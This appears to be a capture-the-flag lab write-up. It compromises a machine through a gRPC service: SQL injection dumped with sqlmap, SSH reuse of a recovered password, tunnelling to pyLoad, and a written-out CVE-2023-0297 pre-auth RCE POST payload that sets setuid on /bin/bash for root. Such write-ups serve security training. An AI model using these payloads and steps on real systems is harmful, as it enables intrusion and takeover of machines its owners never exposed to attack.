Target IP: 10.129.209.172
Challenge Description: N/A.
Performing a port scan using the command sudo nmap -sS 10.129.209.172 -p- returns the result shown above. There are two TCP ports open on the target machine: SSH and some other application on port 50051. Time to perform an aggressive port scan against these ports to identify its services.
┌──(kali㉿kali)-[~/Desktop/Lab-Resource/Completed/PC] └─$ sudo nmap -sV -A 10.129.209.172 -p 22,50051 Starting Nmap 7.94 ( https://nmap.org ) at 2024-05-09 19:09 UTC Nmap scan report for 10.129.209.172 Host is up (0.023s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 91:bf:44:ed:ea:1e:32:24:30:1f:53:2c:ea:71:e5:ef (RSA) | 256 84:86:a6:e2:04:ab:df:f7:1d:45:6c:cf:39:58:09:de (ECDSA) |_ 256 1a:a8:95:72:51:5e:8e:3c:f1:80:f5:42:fd:0a:28:1c (ED25519) 50051/tcp open unknown 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port50051-TCP:V=7.94%I=7%D=5/9%Time=663D1F70%P=x86_64-pc-linux-gnu%r(NU SF:LL,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\xff\xff\0\x05\0\?\xff\xff\0\x06 SF:\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\0\0\0\0\0\?\0\0")%r(GenericL SF:ines,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\xff\xff\0\x05\0\?\xff\xff\0\x SF:06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\0\0\0\0\0\?\0\0")%r(GetReq SF:uest,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\xff\xff\0\x05\0\?\xff\xff\0\x SF:06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\0\0\0\0\0\?\0\0")%r(HTTPOp SF:tions,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\xff\xff\0\x05\0\?\xff\xff\0\ SF:x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\0\0\0\0\0\?\0\0")%r(RTSPR SF:equest,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\xff\xff\0\x05\0\?\xff\xff\0 SF:\x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\0\0\0\0\0\?\0\0")%r(RPCC SF:heck,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\xff\xff\0\x05\0\?\xff\xff\0\x SF:06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\0\0\0\0\0\?\0\0")%r(DNSVer SF:sionBindReqTCP,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\xff\xff\0\x05\0\?\x SF:ff\xff\0\x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\0\0\0\0\0\?\0\0" SF:)%r(DNSStatusRequestTCP,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\xff\xff\0\ SF:x05\0\?\xff\xff\0\x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\0\0\0\0 SF:\0\?\0\0")%r(Help,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\xff\xff\0\x05\0\ SF:?\xff\xff\0\x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\0\0\0\0\0\?\0 SF:\0")%r(SSLSessionReq,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\xff\xff\0\x05 SF:\0\?\xff\xff\0\x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\0\0\0\0\0\ SF:?\0\0")%r(TerminalServerCookie,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\xff SF:\xff\0\x05\0\?\xff\xff\0\x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\ SF:0\0\0\0\0\?\0\0")%r(TLSSessionReq,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\ SF:xff\xff\0\x05\0\?\xff\xff\0\x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08 SF:\0\0\0\0\0\0\?\0\0")%r(Kerberos,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\xf SF:f\xff\0\x05\0\?\xff\xff\0\x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0 SF:\0\0\0\0\0\?\0\0")%r(SMBProgNeg,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\xf SF:f\xff\0\x05\0\?\xff\xff\0\x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0 SF:\0\0\0\0\0\?\0\0")%r(X11Probe,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\xff\ SF:xff\0\x05\0\?\xff\xff\0\x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\0 SF:\0\0\0\0\?\0\0"); Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running (JUST GUESSING): Linux 5.X|4.X|2.6.X (97%) OS CPE: cpe:/o:linux:linux_kernel:5.0 cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:2.6.32 Aggressive OS guesses: Linux 5.0 (97%), Linux 4.15 - 5.8 (90%), Linux 5.0 - 5.4 (90%), Linux 5.3 - 5.4 (89%), Linux 2.6.32 (89%), Linux 5.0 - 5.5 (88%) No exact OS matches for host (test conditions non-ideal). Network Distance: 2 hops Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE (using port 22/tcp) HOP RTT ADDRESS 1 28.17 ms 10.10.14.1 2 27.64 ms 10.129.209.172 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 44.02 seconds
┌──(kali㉿kali)-[~/Desktop/Lab-Resource/Completed/PC]
└─$ sudo nmap -sV -A 10.129.209.172 -p 22,50051
Starting Nmap 7.94 ( https://nmap.org ) at 2024-05-09 19:09 UTC
Nmap scan report for 10.129.209.172
Host is up (0.023s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 91:bf:44:ed:ea:1e:32:24:30:1f:53:2c:ea:71:e5:ef (RSA)
| 256 84:86:a6:e2:04:ab:df:f7:1d:45:6c:cf:39:58:09:de (ECDSA)
|_ 256 1a:a8:95:72:51:5e:8e:3c:f1:80:f5:42:fd:0a:28:1c (ED25519)
50051/tcp open unknown
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port50051-TCP:V=7.94%I=7%D=5/9%Time=663D1F70%P=x86_64-pc-linux-gnu%r(NU
SF:LL,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\xff\xff\0\x05\0\?\xff\xff\0\x06
SF:\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\0\0\0\0\0\?\0\0")%r(GenericL
SF:ines,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\xff\xff\0\x05\0\?\xff\xff\0\x
SF:06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\0\0\0\0\0\?\0\0")%r(GetReq
SF:uest,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\xff\xff\0\x05\0\?\xff\xff\0\x
SF:06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\0\0\0\0\0\?\0\0")%r(HTTPOp
SF:tions,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\xff\xff\0\x05\0\?\xff\xff\0\
SF:x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\0\0\0\0\0\?\0\0")%r(RTSPR
SF:equest,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\xff\xff\0\x05\0\?\xff\xff\0
SF:\x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\0\0\0\0\0\?\0\0")%r(RPCC
SF:heck,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\xff\xff\0\x05\0\?\xff\xff\0\x
SF:06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\0\0\0\0\0\?\0\0")%r(DNSVer
SF:sionBindReqTCP,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\xff\xff\0\x05\0\?\x
SF:ff\xff\0\x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\0\0\0\0\0\?\0\0"
SF:)%r(DNSStatusRequestTCP,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\xff\xff\0\
SF:x05\0\?\xff\xff\0\x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\0\0\0\0
SF:\0\?\0\0")%r(Help,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\xff\xff\0\x05\0\
SF:?\xff\xff\0\x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\0\0\0\0\0\?\0
SF:\0")%r(SSLSessionReq,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\xff\xff\0\x05
SF:\0\?\xff\xff\0\x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\0\0\0\0\0\
SF:?\0\0")%r(TerminalServerCookie,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\xff
SF:\xff\0\x05\0\?\xff\xff\0\x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\
SF:0\0\0\0\0\?\0\0")%r(TLSSessionReq,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\
SF:xff\xff\0\x05\0\?\xff\xff\0\x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08
SF:\0\0\0\0\0\0\?\0\0")%r(Kerberos,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\xf
SF:f\xff\0\x05\0\?\xff\xff\0\x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0
SF:\0\0\0\0\0\?\0\0")%r(SMBProgNeg,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\xf
SF:f\xff\0\x05\0\?\xff\xff\0\x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0
SF:\0\0\0\0\0\?\0\0")%r(X11Probe,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\xff\
SF:xff\0\x05\0\?\xff\xff\0\x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\0
SF:\0\0\0\0\?\0\0");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Linux 5.X|4.X|2.6.X (97%)
OS CPE: cpe:/o:linux:linux_kernel:5.0 cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:2.6.32
Aggressive OS guesses: Linux 5.0 (97%), Linux 4.15 - 5.8 (90%), Linux 5.0 - 5.4 (90%), Linux 5.3 - 5.4 (89%), Linux 2.6.32 (89%), Linux 5.0 - 5.5 (88%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 22/tcp)
HOP RTT ADDRESS
1 28.17 ms 10.10.14.1
2 27.64 ms 10.129.209.172
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 44.02 secondsI performed an aggressive port scan against the two TCP ports using the command sudo nmap -sV -A 10.129.209.172 -p 22,50051 and obtained the result shown above. This odd application on port 50051 is intruging. I will need to find out what runs on this port.
Port 50051: ?
I did a Google search for Port 50051 application and retrieved the website shown above. By the looks of it, the application gRPC run on this port by default. I will need to find tools that I can use to interact with the RPC methods on gRPC servers.
One such tool is gRPCurl, as shown above. I found this Github project here. I downloaded a copy of the binary executable file on my machine. Time to run it.
I changed the binary to be executable. Then using the command ./grpcurl -plaintext 10.129.209.172:50051 list, I listed all the services exposed by the target server and identified the service called SimpleApp. Then using the command ./grpcurl -plaintext 10.129.209.172:50051 describe SimpleApp, I identified all the methods exposed by this service. There are three services: LoginUser, RegisterUser, and getInfo as shown above. OK, it seems like the target machine is really running gRPC on this port. Although this tool gRPCurl is good, I am having trouble invoking the RPC methods. Time to find a better tool. One such tool is called grpcui -- a web based application.
I found very helpful tips on how to enumerate this port at this website:https://www.huxxit.com/index.php/2023/05/25/notes-on-pentesting-ctf-hacking-a-grpc-application/. Following the steps, I installed grpcui on my machine. I browsed to https://github.com/fullstorydev/grpcui/releases and downloaded the latest version with the filename grpcui_1.4.1_linux_x86_64.tar.gz. Then I extracted this on my machine. Inside the extracted folder contains the binary executable file grpcui. Time to test it now :)
I executed the command ./grpcui -plaintext 10.129.209.172:50051 to run the web application. And bingo! Now I can invoke the RPC methods on the target machine's gRPC service directly using this web based application, as shown above. I notice I can use the three services I identified earlier.
I tried to create an account using the credentials test:tester by invoking the service RegisterUser, as shown above.
And bingo! It worked. I wonder what happens if I try to login as this new user by invoking the service LoginUser. Time to find out.
I changed the service to LoginUser and added the POST data credentials, as shown above.
It worked. I successfully logged in. I also obtained some sort of token and a user ID, as shown above. This is interesting. There is one more service which I have not checked: getInfo.
I notice this service only takes in the ID parameter. I passed in the parameter 43 and...
It claims it is missing the token. Hmmm... Maybe I can capture the POST request using burpsuite and append the token myself to see the output? I created a new user with the credentials testing:testing. This user has the ID of 796 and the token of b'eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoidGVzdGluZyIsImV4cCI6MTcxNTI5NzAyMn0.1AABAxapZ_7KFBrO3qsrcSxJdntUqbHFy-qOXe9WU7M'. I made a request but the token parameter was still missing. Time to add it myself now.
And bingo! I added the token header myself and obtained the result shown above after intercepting the request using POST. Right away, I notice the values are stored in JSON format. Can I perform JSON Injection attack?
I relayed the request to the Repeater tool. Then I performed injection. The first parameter I tested is id, as shown above. I inserted a single quote after the number 796 and obtained the interesting error message: Unexpected \u003cclass 'TypeError'\u003e: bad argument type for built-in operation. Is this a SQL injection?
I created another account and used the service getInfo to obtain the result shown above. This service worked successfully and I obtained the message Will update soon. From previous enumeration, I noticed the application was vulnerable to injection attacks. Time to save this request and run sqlmap on it. The tokens for this user are the following :
id: 549 token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoiaGVsbG8iLCJleHAiOjE3MTUyOTg1Mjd9.ShcAOtDu03kMEOfuawvp2Ctg82QPmdzpwsxtSwAta-A
id: 549
token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoiaGVsbG8iLCJleHAiOjE3MTUyOTg1Mjd9.ShcAOtDu03kMEOfuawvp2Ctg82QPmdzpwsxtSwAta-A
I saved the request to a file called req on my machine. Then using the command sqlmap -r req --dump, I obtained the crucial information shown above. This tool successfully managed to dump the contents of the database tables! There is even the password of the user sau. It even contains the credentials sau:HereIsYourPassWord1431. The only attack vector left now is SSH. Time to test the credentials against the SSH application on port 22.
And bingo! I successfully managed to SSH into the target machine as the user sau with the password HereIsYourPassWord1431. Now I have a foothold on the target machine as the user sau :)
Running the command netstat -antop shows there is another application running on the port 8000 of the 127.0.0.1 interface. Since I have SSH credentials of the user sau, I can use SSH tunneling technique to expose this service outside the network so I can access it from my machine.
To setup the SSH tunneling, I opened a new terminal session and used the command ssh -N -L 8444:localhost:8000 sau@10.129.209.172. I forwarded the traffic from port 8000 on the target machine to my machine at port 8444. Then I browsed to http://127.0.0.1:8444 and accessed the PyLoad web application, as shown above. Previously, I identified another set of credentials admin:admin -- will this work here? However, I had no luck even with the default credentials. What application version is this?
Using the command pyload --version, I managed to obtain the application version 0.5.0 as shown above. Doing a Google search shows it is vulnerable to pre-auth RCE. This vulnerability has the CVE id of CVE-2023-0297.
I found the PoC for this exploit at https://github.com/bAuh0lz/CVE-2023-0297_Pre-auth_RCE_in_pyLoad. The steps are simple, as shown above. I have to create a POST request with the PoC above. I will need to insert my own payload. At first, I used a reverse shell payload but this was not reliable. Therefore, I decided to change the permission of /bin/bash to give me a root shell by using the command chmod +u /bin/bash. The raw POST payload is the following:
POST /flash/addcrypted2 HTTP/1.1
Host: 127.0.0.1:8444
Content-Type: application/x-www-form-urlencoded
Content-Length: 112
jk=pyimport%20os;os.system("chmod+%2bs+/bin/bash");f=function%20f2(){};&package=xxx&crypted=AAAA&&passwords=aaaaPOST /flash/addcrypted2 HTTP/1.1
Host: 127.0.0.1:8444
Content-Type: application/x-www-form-urlencoded
Content-Length: 112
jk=pyimport%20os;os.system("chmod+%2bs+/bin/bash");f=function%20f2(){};&package=xxx&crypted=AAAA&&passwords=aaaa
And bingo. After sending the payload, I executed the command bash -p to spawn a root shell, as shown above. Now I have a root shell on the target machine :) GG.
The two flags are shown above.